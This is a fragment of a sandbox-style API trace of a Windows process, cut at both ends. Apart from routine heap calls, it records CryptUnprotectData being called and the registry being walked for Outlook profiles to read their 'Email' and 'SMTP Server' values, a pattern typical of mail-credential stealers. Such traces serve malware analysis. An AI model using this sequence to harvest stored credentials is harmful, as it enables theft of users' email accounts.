(HeapHandle=0x3f0000, Flags=0x0, Size=0x3) returned 0x90d56c0 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d5700 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x4) returned 0x90d5700 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6) returned 0x90d56c0 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d5700 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x9126318 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd) returned 0x9126330 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126318 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x13) returned 0x4151f0 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126330 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c) returned 0x41e2b8 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4151f0 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2a) returned 0x9174e58 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2b8 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x3f) returned 0x9127840 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5e) returned 0x4cd6e8 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8d) returned 0x401d10 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd3) returned 0x90d0f40 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x13c) returned 0x445f58 [0135.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d0f40 | out: hHeap=0x3f0000) returned 1 [0135.397] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x130) returned 0x9145a28 [0135.397] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x77550000 [0135.398] CryptUnprotectData (in: pDataIn=0x36f248, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x0, pDataOut=0x36f250 | out: ppszDataDescr=0x0, pDataOut=0x36f250) returned 1 [0135.454] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2b8 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9145a28 | out: hHeap=0x3f0000) returned 1 [0135.454] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0135.454] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0135.454] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0135.454] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0135.454] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0135.454] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b3f0 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2b8 | out: hHeap=0x3f0000) returned 1 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445f58 | out: hHeap=0x3f0000) returned 1 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126300 | out: hHeap=0x3f0000) returned 1 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2e0 | out: hHeap=0x3f0000) returned 1 [0135.454] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.454] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b3f0 | out: hHeap=0x3f0000) returned 1 [0135.454] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.454] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x3, lpName=0x91372c0, cchName=0x100 | out: lpName="00000004") returned 0x0 [0135.454] RegOpenKeyA (in: hKey=0x5ac, lpSubKey="00000004", phkResult=0x36f3b8 | out: phkResult=0x36f3b8*=0x5b0) returned 0x0 [0135.455] RegQueryValueExA (in: hKey=0x5b0, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0xf8, lpcbData=0x36f264*=0x200) returned 0x2 [0135.455] RegQueryValueExA (in: hKey=0x5b0, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0xf8, lpcbData=0x36f264*=0x200) returned 0x2 [0135.455] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.455] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x4, lpName=0x91372c0, cchName=0x100 | out: lpName="00000004") returned 0x103 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91372c0 | out: hHeap=0x3f0000) returned 1 [0135.455] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.455] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0xc, lpName=0x91283f0, cchName=0x400 | out: lpName="a533ec91a4f74549ac2130b6908c8aac") returned 0x0 [0135.455] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.455] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.455] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.455] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\a533ec91a4f74549ac2130b6908c8aac", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.455] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.455] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.455] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.455] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.455] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.455] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09À1B") returned 0x103 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.455] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.456] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.456] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0xd, lpName=0x91283f0, cchName=0x400 | out: lpName="b70c659765f94740b657fee657d05ab4") returned 0x0 [0135.456] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.456] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.456] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.456] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\b70c659765f94740b657fee657d05ab4", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.456] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.456] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.456] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.456] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.456] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.456] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.456] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.456] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.456] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.456] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09À1B") returned 0x103 [0135.456] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.456] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.456] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.456] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.456] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.456] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0xe, lpName=0x91283f0, cchName=0x400 | out: lpName="cce6b8ce16bac4458e5e40e3530d6f1d") returned 0x0 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.457] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\cce6b8ce16bac4458e5e40e3530d6f1d", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.457] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.457] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.457] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.457] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.457] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09À1B") returned 0x103 [0135.457] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.457] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.457] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.457] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.457] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.457] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0xf, lpName=0x91283f0, cchName=0x400 | out: lpName="dd7f40a823cda64b92e9a96e9e46e406") returned 0x0 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.457] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.457] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\dd7f40a823cda64b92e9a96e9e46e406", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.458] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09À1B") returned 0x103 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.458] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.458] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x10, lpName=0x91283f0, cchName=0x400 | out: lpName="ddb0922fc50b8d42be5a821ede840761") returned 0x0 [0135.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.458] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\ddb0922fc50b8d42be5a821ede840761", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.459] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09À1B") returned 0x103 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.459] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.459] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x11, lpName=0x91283f0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x0 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.459] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.460] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09À1B") returned 0x103 [0135.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.460] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.460] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x12, lpName=0x91283f0, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x0 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x401d10 [0135.460] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\{D9734F19-8CFB-411D-BC59-833E334FCB5E}", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0135.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0135.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x401d10 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.461] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="Calendar Summary") returned 0x0 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x46f618 [0135.461] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\\Calendar Summary", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x46f618 | out: hHeap=0x3f0000) returned 1 [0135.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2e0 | out: hHeap=0x3f0000) returned 1 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0135.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2e0 | out: hHeap=0x3f0000) returned 1 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x46f618 [0135.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0135.461] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09À1B") returned 0x103 [0135.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0135.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x46f618 | out: hHeap=0x3f0000) returned 1 [0135.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2e0 | out: hHeap=0x3f0000) returned 1 [0135.461] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.461] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91287f8, cchName=0x400 | out: lpName="Calendar Summary") returned 0x103 [0135.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0135.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0135.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.462] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.462] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x13, lpName=0x91283f0, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103 [0135.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91283f0 | out: hHeap=0x3f0000) returned 1 [0135.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.462] RegCloseKey (hKey=0x5a8) returned 0x0 [0135.462] RegEnumKeyA (in: hKey=0x5a4, dwIndex=0x1, lpName=0x9145620, cchName=0x400 | out: lpName="Outlook") returned 0x103 [0135.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9145620 | out: hHeap=0x3f0000) returned 1 [0135.462] RegCloseKey 